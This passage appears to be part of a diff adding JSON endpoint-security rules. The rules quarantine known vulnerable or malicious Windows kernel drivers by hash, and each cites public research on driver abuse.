"2026-03-23T11:45:31.154538Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154543Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eabb2df58b057820cc50c7dcf5d40e8a705b4b87034909f9f0e246ca01aa9e75", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2977d0cd-5454-5b73-b0ae-6a5020444b22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457450Z", + "creation_date": "2026-03-23T11:45:30.457453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2978634e-cab4-5ea5-8389-b51d38d6e6e2", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819637Z", + "creation_date": "2026-03-23T11:45:30.819639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819645Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2203bd4731a8fdc2a1c60e975fd79fd5985369e98a117df7ee43c528d3c85958", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2983778e-2354-55fb-95c4-e8e8dda0e606", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500787Z", + "creation_date": "2026-03-23T11:45:31.500790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500799Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8210ad8240cda74c5f7a4a328be2182ffe3395c3dd9b0882ad801715a5387772", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29843084-aa9e-51d4-8192-c79b760012d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825529Z", + "creation_date": "2026-03-23T11:45:31.825531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06b0976210196e847367d79c7bdc8ca9a8c078af7b5ad20cbfc61dbc0fb267af", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29a6311c-8046-5d45-83ef-4fad95eff34a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983686Z", + "creation_date": "2026-03-23T11:45:29.983688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980", + "comment": "Vulnerable Kernel Driver (aka WCPU.sys) [https://www.loldrivers.io/drivers/7f645b95-4374-47ae-be1a-e4415308b550/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29afccbb-b875-5d92-a880-906165790491", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828278Z", + "creation_date": "2026-03-23T11:45:31.828281Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828290Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b63666ddf88d0b624170e3799d8bbb1013868b272a6a33d1e3228a458a17a9de", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29d15e5e-eb16-5057-8ac1-9d4207e00314", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485676Z", + "creation_date": "2026-03-23T11:45:31.485680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d9ea84656fca35befae97f0320a3373ceeb6001cdb296e0b7d38e9032e571b6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29e421e8-c55e-5810-8506-2e050cf1abe5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816191Z", + "creation_date": "2026-03-23T11:45:30.816193Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e3bc2d7bc56971457d642458563435c7e5c9c3c7c079ef5abeb6a61fb4d52ea", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "29f5a697-7650-57d2-992f-505712953bf7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142524Z", + "creation_date": "2026-03-23T11:45:31.142526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "139cf28440079aa09f659a9d29a3fc5800071d69fdbe57f0a07b42ec9baa6ea4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a0b1644-6fa5-5e00-9b72-6ecfe006d24c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831036Z", + "creation_date": "2026-03-23T11:45:30.831038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d5f1f60a027b52eedd8c48c003f193241f492970a078c0c8d9bbc1391efd9ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a1f2b20-8cb2-556f-9148-e4225b967f66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822657Z", + "creation_date": "2026-03-23T11:45:31.822660Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822669Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1556dd49b3de1aa42158edd10ecc67cdc395d9ee87905562ea6b080a9ed429d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a2f6431-3538-5347-809a-04ab34479b4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973861Z", + "creation_date": "2026-03-23T11:45:29.973863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973879Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8027daa6facf1ff81405daf6763249e9acf232a1a191b6bf106711630e6188e", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a3570d8-35a3-5499-a8c9-d5b09d3d2e78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979619Z", + "creation_date": "2026-03-23T11:45:29.979621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979626Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88b901ce8ee199bc371e9cf39ab5375d31c6881a25ba5827e9b32ba7946ecda1", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a3faaa6-dc9f-5d6c-abf3-5f3d6b81832f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821639Z", + "creation_date": "2026-03-23T11:45:30.821642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821651Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c9e257c9740561b5744812e1343815e7972c362c8993d972b96a56e18c712f3", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a464168-06e1-5cda-a44f-d05e5c143707", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481289Z", + "creation_date": "2026-03-23T11:45:30.481291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481297Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcf811040c7552a2c93409a6cd2d63f8abbae121acca012e0b7f4fdc0b6a6b8b", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a541ac9-f8df-5115-b0c2-018022f632ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486906Z", + "creation_date": "2026-03-23T11:45:31.486909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486918Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b28842c58a0845fe6cba9c76192f166454ede275d74942de18df2dd3a71eb2a1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a601188-1f95-5eb8-bfab-13dd5b1a273c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144372Z", + "creation_date": "2026-03-23T11:45:32.144374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8c5227d8827405e0e13a16bbacc6959edd3de95bc167566f742a6c221a0fe75", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) 
[https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a859023-f148-5ec1-b7af-4b3a9978fa34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818680Z", + "creation_date": "2026-03-23T11:45:31.818684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eeca04c3c5d230fed7aa5cf9a4c5201d9253a6aaf8a68cdd8835b3d845024873", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a8b8ac4-b24c-5521-8f7c-c559463dafe7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807623Z", + "creation_date": 
"2026-03-23T11:45:31.807625Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807631Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c1ec0557e0e5f59b30348ba919bf87feb938c2d1c5672d0aa67ebcd0f12ae86", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a91d3b7-8394-598a-96f7-54c79ddfb442", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473338Z", + "creation_date": "2026-03-23T11:45:30.473341Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473350Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "636b4c1882bcdd19b56370e2ed744e059149c64c96de64ac595f20509efa6220", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2a98a78f-6e36-54c3-9a22-bc9732e5bfca", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818438Z", + "creation_date": "2026-03-23T11:45:31.818442Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "716400501309b00b9003430749a2579b4c35867b6b8b383a83a8f7f76fe9f3d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2aa40a11-9039-510d-8ddc-ada7a6b7a01b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612957Z", + "creation_date": "2026-03-23T11:45:29.612959Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.612964Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25bc1b72ba6092674ec561d7de8f5e4a7adb23c29fa68de5b29a30a671257dac", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ab01bd4-47da-5cb2-ae69-c29e057f43ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971202Z", + "creation_date": "2026-03-23T11:45:29.971205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ab22cbf-3327-5822-98fb-7620cbb1720e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613841Z", + "creation_date": "2026-03-23T11:45:29.613843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df82f155376b4e95a3f497b7362ba6039c04d2ae78926f626dbe1a459bc626d7", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] 